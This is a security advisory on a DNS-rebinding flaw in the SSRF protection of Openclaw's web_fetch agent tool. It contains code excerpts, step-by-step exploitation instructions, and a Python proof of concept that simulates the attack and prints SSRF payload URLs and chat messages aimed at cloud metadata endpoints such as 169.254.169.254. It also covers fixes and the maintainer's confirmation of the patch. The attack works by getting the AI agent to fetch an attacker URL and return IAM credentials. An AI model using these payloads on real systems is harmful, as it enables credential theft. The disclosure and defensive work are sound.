| Attribute | Value |
|---|---|
| Vulnerability Type | CWE-918: Server-Side Request Forgery (SSRF) |
| Severity | 🟡 Medium |
| CVSS 3.1 Base Score | 5.3 (Medium) |
| CVSS 3.1 Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N |
| Affected Versions | All versions (as of audit date) |
| Attack Vector | Network |
| Attack Complexity | High (requires DNS control) |
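
The base score can be recomputed from the vector string as a sanity check. The sketch below applies the CVSS 3.1 base equations for the Scope: Unchanged case only; `WEIGHTS`, `roundup`, and `base_score` are illustrative names, not part of Openclaw. Under these equations the vector listed in the table evaluates to 5.9, while 5.3 is what the same vector yields with PR:L, so one of the two rows may need revisiting.

```python
import math

# CVSS 3.1 metric weights for the Scope: Unchanged case (per the FIRST specification).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, using the integer method from CVSS 3.1."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score of a CVSS 3.1 vector (Scope: Unchanged only)."""
    # Skip the leading "CVSS:3.1" and split the rest into metric/value pairs.
    metrics = dict(part.split(":") for part in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch only handles Scope: Unchanged")
    w = {name: WEIGHTS[name][metrics[name]] for name in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


listed = base_score("CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N")
with_low_privileges = base_score("CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N")
print(listed, with_low_privileges)
```

PR:L would be a plausible reading of the "messaging channel access" prerequisite, but which value was intended is not stated in the report.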

Openclaw's web_fetch tool lets AI agents fetch URL content. The project implements SSRF protection (blocking private IPs and special domain names), but that protection has a DNS rebinding TOCTOU (Time-of-Check to Time-of-Use) flaw.

The security check (assertPublicHostname) and the actual HTTP request (fetch) each resolve the hostname independently. An attacker who controls the domain's DNS can answer the first lookup with a public IP and the second with an internal IP, so the request bypasses the check.

| Condition | Description | Difficulty |
|---|---|---|
| ① Messaging channel access | Attacker can send messages to the bot | Medium |
| ② AI model cooperation | Model invokes web_fetch to retrieve attacker URL | Medium |
| ③ DNS server control | Attacker controls domain's DNS server | High |
| ④ Precise timing control | DNS record must switch after check but before request | High |
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOURCE: AI Tool Call Parameters │
├─────────────────────────────────────────────────────────────────────────────┤
│ src/agents/tools/web-fetch.ts:575-598 │
│ │
│ execute: async (_toolCallId, args) => { │
│ const url = readStringParam(params, "url", { required: true }); │
│ // url comes from AI model decision, can be influenced by user message │
│ // User message: "Please fetch content from http://rebind.attacker.com/secret" │
└──────────────────────────────────┬──────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────────────────────┐
│ SECURITY GATE: SSRF Protection Check │
├──────────────────────────────────────────────────────────────────────────────┤
│ src/agents/tools/web-fetch.ts:176-198 fetchWithRedirects() │
│ │
│ async function fetchWithRedirects(...) { │
│ // Step 1: DNS resolution and IP check (T1) │
│ await assertPublicHostname(parsedUrl.hostname); // ← DNS query #1 │
│ // ⚠️ Time window begins - attacker can switch DNS record here │
│ │
│ src/infra/net/ssrf.ts:104-131 assertPublicHostname() │
│ → isBlockedHostname() checks blacklisted domain names │
│ → isPrivateIpAddress() checks private IPs │
│ → dns.lookup() resolves domain name │
│ → Checks if resolved IP is a private address │
└──────────────────────────────────┬───────────────────────────────────────────┘
↓
┌──────────────────────────────────────────────────────────────────────────────┐
│ SINK: HTTP Request Execution │
├──────────────────────────────────────────────────────────────────────────────┤
│ src/agents/tools/web-fetch.ts:187-189 │
│ │
│ // Step 2: Actual HTTP request (T2) │
│ const res = await fetch(parsedUrl.toString(), { │
│ method: "GET", │
│ redirect: "manual", // Handle redirects manually │
│ signal, │
│ }); │
│ // ⚠️ fetch() internally performs DNS resolution again! │
│ // If attacker switched DNS record between T1 and T2, │
│ // request may go to different IP (e.g., 169.254.169.254) │
└──────────────────────────────────────────────────────────────────────────────┘

File: src/agents/tools/web-fetch.ts
// Lines 575-598
execute: async (_toolCallId, args, signal) => {
  const params = args as {
    url: string;
    prompt?: string;
    // ...
  };
  const url = readStringParam(params, "url", { required: true }); // ← SOURCE
  // ...
  const result = await fetchWithRedirects({
    url, // ← Passed to fetchWithRedirects
    // ...
  });
}

File: src/agents/tools/web-fetch.ts
// Lines 165-221
async function fetchWithRedirects(params: {
  url: string;
  // ...
}): Promise<...> {
  // ...
  while (true) {
    const parsedUrl = new URL(currentUrl);
    // SSRF check (T1 - DNS query #1)
    await assertPublicHostname(parsedUrl.hostname);
    // ⚠️ TOCTOU window - DNS may change here
    // Actual request (T2 - may trigger DNS query #2)
    const res = await fetch(parsedUrl.toString(), { // ← SINK
      method: "GET",
      redirect: "manual",
      signal,
    });
    // ...
  }
}

File: src/infra/net/ssrf.ts
// Lines 104-131
export async function assertPublicHostname(
  hostname: string,
  lookupFn: typeof lookup = lookup
): Promise<void> {
  const normalized = hostname.toLowerCase().trim();
  // Check blacklisted domain names
  if (isBlockedHostname(normalized)) {
    throw new SsrFBlockedError(`Blocked hostname: ${normalized}`);
  }
  // Check if it's a private IP literal
  if (isPrivateIpAddress(normalized)) {
    throw new SsrFBlockedError(`Private IP address: ${normalized}`);
  }
  // DNS resolution and check results
  const results = await lookupFn(normalized, { all: true }); // ← DNS query
  for (const entry of results) {
    if (isPrivateIpAddress(entry.address)) {
      throw new SsrFBlockedError(
        `DNS resolves to private IP: ${entry.address}`
      );
    }
  }
  // ⚠️ Check passed at this point, but fetch() may use different DNS result
}

Timeline:
────────────────────────────────────────────────────────────────────
T1: assertPublicHostname("rebind.attacker.com")
    │
    ├── DNS query: rebind.attacker.com
    │   └── Attacker DNS returns: 93.184.216.34 (public IP)
    │
    └── Check passes ✓

T2: Attacker quickly switches DNS record
    │
    └── rebind.attacker.com → 169.254.169.254 (AWS metadata)

T3: fetch("http://rebind.attacker.com/...")
    │
    ├── Node.js internal DNS query (may use new record)
    │   └── Resolves to: 169.254.169.254
    │
    └── Request sent to AWS metadata service!
────────────────────────────────────────────────────────────────────

- Prepare DNS server:
  - Control DNS for domain rebind.attacker.com
  - Set TTL = 0 (disable caching)
  - Configure DNS server to alternate between public IP and target internal IP
- Send attack message:
  Please help me fetch content from: http://rebind.attacker.com/latest/meta-data/iam/security-credentials/
- DNS Rebinding timing:
  - First DNS query (security check): Returns public IP → passes
  - Second DNS query (fetch): Returns 169.254.169.254 → request goes to metadata
- Obtain results:
  - AI returns AWS IAM credentials to attacker

#!/usr/bin/env python3
"""
Openclaw SSRF Vulnerability POC

This POC demonstrates the SSRF protection mechanism and DNS Rebinding attack principle.

Usage:
    python3 poc_ssrf.py

Note:
    Actual DNS Rebinding exploitation requires control of a DNS server.
    This POC only demonstrates the protection mechanism and theoretical attack flow.
"""
import ipaddress
import socket
from typing import Dict, List, Tuple

# SSRF protection logic copied from src/infra/net/ssrf.ts
BLOCKED_HOSTNAMES = {
    "localhost",
    "metadata.google.internal",
    "metadata.google",
    "169.254.169.254",
    "[::1]",
}
PRIVATE_IPV6_PREFIXES = ["fe80:", "fec0:", "fc", "fd"]


def is_private_ipv4(ip: str) -> bool:
    """Check if it's a private IPv4 address"""
    try:
        addr = ipaddress.IPv4Address(ip)
        return (
            addr.is_private or
            addr.is_loopback or
            addr.is_link_local or
            addr.is_reserved
        )
    except ipaddress.AddressValueError:
        return False


def is_private_ipv6(ip: str) -> bool:
    """Check if it's a private IPv6 address"""
    normalized = ip.lower()
    # Check known private prefixes
    for prefix in PRIVATE_IPV6_PREFIXES:
        if normalized.startswith(prefix):
            return True
    # IPv6-mapped IPv4
    if normalized.startswith("::ffff:"):
        ipv4_part = normalized[7:]
        if is_private_ipv4(ipv4_part):
            return True
    # Loopback
    if normalized == "::1":
        return True
    try:
        addr = ipaddress.IPv6Address(ip)
        return addr.is_private or addr.is_loopback or addr.is_link_local
    except ipaddress.AddressValueError:
        return False


def is_private_ip_address(ip: str) -> bool:
    """Check if it's a private IP address"""
    if ":" in ip:
        return is_private_ipv6(ip)
    return is_private_ipv4(ip)


def is_blocked_hostname(hostname: str) -> bool:
    """Check if hostname is blocked"""
    normalized = hostname.lower().strip()
    if normalized in BLOCKED_HOSTNAMES:
        return True
    if normalized.endswith(".localhost"):
        return True
    if normalized.endswith(".local"):
        return True
    if normalized.endswith(".internal"):
        return True
    return False


def dns_lookup(hostname: str) -> List[Tuple[str, int]]:
    """Perform DNS lookup"""
    try:
        results = socket.getaddrinfo(hostname, None, socket.AF_UNSPEC)
        ips = []
        seen = set()
        for result in results:
            ip = result[4][0]
            family = result[0]
            if ip not in seen:
                seen.add(ip)
                ips.append((ip, family))
        return ips
    except socket.gaierror as e:
        raise Exception(f"DNS lookup failed: {e}")


def assert_public_hostname(hostname: str) -> Dict:
    """
    Simulates src/infra/net/ssrf.ts assertPublicHostname()
    Returns check result
    """
    normalized = hostname.lower().strip()
    # Step 1: Check blacklisted domain names
    if is_blocked_hostname(normalized):
        return {
            "blocked": True,
            "reason": f"Blocked hostname: {normalized}",
            "resolved": None
        }
    # Step 2: Check if it's a private IP literal
    if is_private_ip_address(normalized):
        return {
            "blocked": True,
            "reason": f"Private IP address: {normalized}",
            "resolved": None
        }
    # Step 3: DNS resolution and check results
    try:
        resolved = dns_lookup(normalized)
        for ip, family in resolved:
            if is_private_ip_address(ip):
                return {
                    "blocked": True,
                    "reason": f"DNS resolves to private IP: {ip}",
                    "resolved": [r[0] for r in resolved]
                }
        return {
            "blocked": False,
            "reason": None,
            "resolved": [r[0] for r in resolved]
        }
    except Exception as e:
        return {
            "blocked": True,
            "reason": str(e),
            "resolved": None
        }


class DnsRebindingSimulator:
    """Simulates DNS Rebinding attack"""

    def __init__(self, domain: str):
        self.domain = domain
        self.query_count = 0
        self.public_ip = "93.184.216.34"  # example.com
        self.target_ip = "169.254.169.254"  # AWS metadata

    def lookup(self, hostname: str) -> List[Tuple[str, int]]:
        """Simulate DNS query, alternating between different IPs"""
        self.query_count += 1
        if self.query_count == 1:
            # First query (security check): Return public IP
            print(f" [DNS Query #{self.query_count}] {hostname} → {self.public_ip} (public)")
            return [(self.public_ip, socket.AF_INET)]
        else:
            # Subsequent queries (actual request): Return target IP
            print(f" [DNS Query #{self.query_count}] {hostname} → {self.target_ip} (REBIND!)")
            return [(self.target_ip, socket.AF_INET)]

    def simulate_attack(self):
        """Simulate complete DNS Rebinding attack"""
        print(f"\n[*] Simulating DNS Rebinding attack on {self.domain}")
        print(f" Target: AWS metadata at {self.target_ip}")
        print()
        # Simulate assertPublicHostname check
        print("[1] Security check (assertPublicHostname):")
        result = self._check_with_mock_dns()
        if result["blocked"]:
            print(f" ✗ Blocked: {result['reason']}")
            return False
        print(f" ✓ Allowed (resolved to {result['resolved']})")
        # Simulate time window
        print("\n[2] Time window (attacker changes DNS):")
        print(f" DNS now points {self.domain} → {self.target_ip}")
        # Simulate fetch request
        print("\n[3] HTTP fetch (uses new DNS):")
        fetch_ip = self.lookup(self.domain)[0][0]
        if fetch_ip == self.target_ip:
            print("\n 🔴 SSRF SUCCESS!")
            print(f" Request sent to {self.target_ip} (AWS metadata)")
            print(" Attacker can now access: /latest/meta-data/iam/security-credentials/")
            return True
        else:
            print(f" Request sent to {fetch_ip}")
            return False

    def _check_with_mock_dns(self) -> Dict:
        """Execute security check using mock DNS"""
        normalized = self.domain.lower().strip()
        if is_blocked_hostname(normalized):
            return {"blocked": True, "reason": "Blocked hostname", "resolved": None}
        resolved = self.lookup(normalized)
        for ip, _ in resolved:
            if is_private_ip_address(ip):
                return {"blocked": True, "reason": f"Private IP: {ip}", "resolved": None}
        # Include "reason" so every return value has the same keys
        return {"blocked": False, "reason": None, "resolved": [r[0] for r in resolved]}


def test_ssrf_protection():
    """Test SSRF protection mechanism"""
    print("=" * 80)
    print("Openclaw SSRF Protection Test")
    print("=" * 80)
    print()
    test_cases = [
        # Should be blocked
        ("localhost", True, "localhost"),
        ("127.0.0.1", True, "loopback IP"),
        ("::1", True, "IPv6 loopback"),
        ("169.254.169.254", True, "AWS metadata IP"),
        ("metadata.google.internal", True, "GCP metadata"),
        ("10.0.0.1", True, "Private 10.x"),
        ("192.168.1.1", True, "Private 192.168.x"),
        ("172.16.0.1", True, "Private 172.16.x"),
        ("evil.localhost", True, ".localhost suffix"),
        ("app.local", True, ".local suffix"),
        # Should be allowed (but may be attacked via DNS rebinding)
        ("example.com", False, "Public domain"),
        ("google.com", False, "Public domain"),
    ]
    passed = 0
    failed = 0
    for hostname, should_block, desc in test_cases:
        result = assert_public_hostname(hostname)
        blocked = result["blocked"]
        status = "✓" if blocked == should_block else "✗"
        blocked_str = "BLOCKED" if blocked else "ALLOWED"
        if blocked == should_block:
            passed += 1
        else:
            failed += 1
        print(f"{status} [{blocked_str}] {desc}: {hostname}")
        if result["reason"]:
            print(f" Reason: {result['reason']}")
        if result["resolved"]:
            print(f" Resolved: {', '.join(result['resolved'][:3])}")
    print()
    print(f"Results: {passed} passed, {failed} failed")
    return passed, failed


def test_dns_rebinding():
    """Test DNS Rebinding attack"""
    print()
    print("=" * 80)
    print("DNS Rebinding Attack Simulation")
    print("=" * 80)
    simulator = DnsRebindingSimulator("rebind.attacker.com")
    success = simulator.simulate_attack()
    print()
    print("=" * 80)
    print("ATTACK ANALYSIS")
    print("=" * 80)
    print(f"""
VULNERABILITY: TOCTOU (Time-of-Check to Time-of-Use) in SSRF protection

AFFECTED CODE:
  src/agents/tools/web-fetch.ts:176-198 fetchWithRedirects()

  async function fetchWithRedirects(...) {{
    await assertPublicHostname(hostname); // T1: DNS check
    // ⚠️ WINDOW: DNS can change here
    const res = await fetch(url, ...); // T2: May use different DNS
  }}

ATTACK REQUIREMENTS:
  1. Attacker controls a DNS server
  2. DNS TTL set to 0 (or very low)
  3. Precise timing to change DNS between T1 and T2
  4. Target service accessible from Openclaw host

PRACTICAL DIFFICULTY: HIGH
  - OS or upstream resolver caches may ignore TTL=0
    (Node.js itself does not cache dns.lookup() results)
  - Timing is difficult to control
  - Requires custom DNS infrastructure

POTENTIAL TARGETS:
  - AWS metadata: 169.254.169.254
  - GCP metadata: metadata.google.internal
  - Azure metadata: 169.254.169.254
  - Kubernetes API: kubernetes.default.svc
  - Internal services: 10.x.x.x, 192.168.x.x
""")


def test_nip_io():
    """Test nip.io-style services (correctly blocked)"""
    print()
    print("=" * 80)
    print("Testing nip.io-style DNS services")
    print("=" * 80)
    print()
    nip_hosts = [
        "127.0.0.1.nip.io",
        "169.254.169.254.nip.io",
        "10.0.0.1.nip.io",
        "192.168.1.1.nip.io",
    ]
    for host in nip_hosts:
        result = assert_public_hostname(host)
        blocked = result["blocked"]
        status = "✓ BLOCKED" if blocked else "✗ ALLOWED"
        print(f"{status}: {host}")
        if result["resolved"]:
            print(f" Resolved: {', '.join(result['resolved'])}")
        if result["reason"]:
            print(f" Reason: {result['reason']}")
    print()
    print("NOTE: nip.io services are correctly blocked by DNS resolution check")


def generate_ssrf_payloads():
    """Generate SSRF attack payloads"""
    print()
    print("=" * 80)
    print("SSRF ATTACK PAYLOADS")
    print("=" * 80)
    print()
    payloads = [
        {
            "target": "AWS Metadata",
            "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
            "message": "Please fetch and summarize the content from http://169.254.169.254/latest/meta-data/",
            "note": "Directly blocked by IP check"
        },
        {
            "target": "GCP Metadata",
            "url": "http://metadata.google.internal/computeMetadata/v1/",
            "message": "Fetch http://metadata.google.internal/computeMetadata/v1/project/project-id",
            "note": "Blocked by hostname blacklist"
        },
        {
            "target": "DNS Rebinding (theoretical)",
            "url": "http://rebind.attacker.com/latest/meta-data/iam/security-credentials/",
            "message": "Please analyze the API response from http://rebind.attacker.com/api/v1/data",
            "note": "Requires attacker-controlled DNS with TTL=0"
        },
        {
            "target": "Internal Network Scan",
            "url": "http://10.0.0.1:8080/admin",
            "message": "Check if http://10.0.0.1:8080/ is accessible",
            "note": "Blocked by private IP check"
        },
    ]
    for p in payloads:
        print(f"[{p['target']}]")
        print(f" URL: {p['url']}")
        print(f" Message: {p['message']}")
        print(f" Status: {p['note']}")
        print()


if __name__ == "__main__":
    test_ssrf_protection()
    test_nip_io()
    test_dns_rebinding()
    generate_ssrf_payloads()

- Use resolved IP for direct requests:

      // Instead of using hostname, use resolved IP directly
      const resolvedIps = await lookup(hostname, { all: true });
      const safeIp = resolvedIps.find(ip => !isPrivateIpAddress(ip.address));
      if (!safeIp) throw new SsrFBlockedError(...);
      // Make request using IP instead of hostname
      // Caveat: for https:// URLs, TLS SNI and certificate validation
      // still need the original hostname
      const url = new URL(originalUrl);
      url.hostname = safeIp.address;
      await fetch(url, { headers: { Host: originalHostname } });

- Implement DNS pinning:

      // Cache DNS results and verify at connection time
      const agent = new http.Agent({
        lookup: (hostname, options, callback) => {
          // Use pre-validated IP; callers that pass { all: true } expect an array
          if (options.all) {
            callback(null, [{ address: preResolvedIp, family: 4 }]);
          } else {
            callback(null, preResolvedIp, 4);
          }
        }
      });

- Socket-level IP validation:

      // Validate target IP at TCP connection establishment
      socket.on('connect', () => {
        const remoteIp = socket.remoteAddress;
        if (isPrivateIpAddress(remoteIp)) {
          // Destroy with an error; a throw inside the event handler would go uncaught
          socket.destroy(new SsrFBlockedError(...));
        }
      });

- Cache DNS results locally so the check and the request see the same answer:

      // Ensure DNS results remain consistent during request
      // Note: setDefaultResultOrder only changes IPv4/IPv6 ordering; it does not
      // cache or pin results, so a local DNS cache is still required
      dns.setDefaultResultOrder('ipv4first');

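
The first two recommendations share one idea: resolve once, validate that answer, and connect to exactly that address. Below is a minimal Python sketch of the idea, in the style of the POC above. `SsrfBlocked`, `resolve_and_pin`, `RebindingResolver`, and the two `connect_target_*` helpers are hypothetical names, and the resolver is a fake that stands in for attacker-controlled DNS, so no network access is involved.

```python
import ipaddress
from typing import Callable, List

# Hypothetical resolver type: hostname -> list of IP address strings.
Resolver = Callable[[str], List[str]]


class SsrfBlocked(Exception):
    """Raised when a hostname resolves to a non-public address."""


def resolve_and_pin(hostname: str, resolver: Resolver) -> str:
    """Resolve once, reject if any answer is non-public, return the IP to pin."""
    addresses = resolver(hostname)
    if not addresses:
        raise SsrfBlocked(f"No addresses for {hostname}")
    for address in addresses:
        if not ipaddress.ip_address(address).is_global:
            raise SsrfBlocked(f"{hostname} resolves to non-public IP {address}")
    return addresses[0]


class RebindingResolver:
    """Fake DNS: public answer on the first query, metadata IP afterwards."""

    def __init__(self) -> None:
        self.queries = 0

    def __call__(self, hostname: str) -> List[str]:
        self.queries += 1
        return ["93.184.216.34"] if self.queries == 1 else ["169.254.169.254"]


def connect_target_vulnerable(hostname: str, resolver: Resolver) -> str:
    """Check-then-use: the connection performs its own, second resolution."""
    resolve_and_pin(hostname, resolver)  # check (query #1), result discarded
    return resolver(hostname)[0]         # use (query #2), may differ


def connect_target_pinned(hostname: str, resolver: Resolver) -> str:
    """Pinned: the validated address is the one that gets connected to."""
    return resolve_and_pin(hostname, resolver)


if __name__ == "__main__":
    host = "rebind.attacker.com"
    print("vulnerable:", connect_target_vulnerable(host, RebindingResolver()))
    print("pinned:    ", connect_target_pinned(host, RebindingResolver()))
```

In a real client the pinned address would be handed to the connection layer (for example, connecting to the IP while sending the original hostname in the Host header), so that no second lookup can occur between the check and the request.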
- OWASP SSRF: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
- DNS Rebinding Attacks: https://en.wikipedia.org/wiki/DNS_rebinding
- Fix & Acknowledgement: https://github.com/openclaw/openclaw/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505#diff-06572a96a58dc510037d5efa622f9bec8519bc1beab13c9f251e97e657a9d4edR44
On #2 that is correct. I fixed the DNS-rebinding TOCTOU issue on main in commit b623557a2 (2026‑01‑26).
The SSRF guard now resolves and pins DNS results, and the subsequent request uses a pinned lookup (undici dispatcher / http(s) lookup) so no second DNS resolution can diverge. Redirects re-resolve and pin per hop. We also added pinning tests to prevent regressions. This closes the rebinding window described in Vulnerability 2.
I never worked on bigger open source projects before nor do I have experience with CVSS and I’m absolutely drowning in pings on every channel.
Will focus on getting an update out today.
I think this classifies as CWE-918 (Server-Side Request Forgery / SSRF), CVSS 3.1 Base 5.3 (Medium) but need more time to understand this in detail.
thanks,
Peter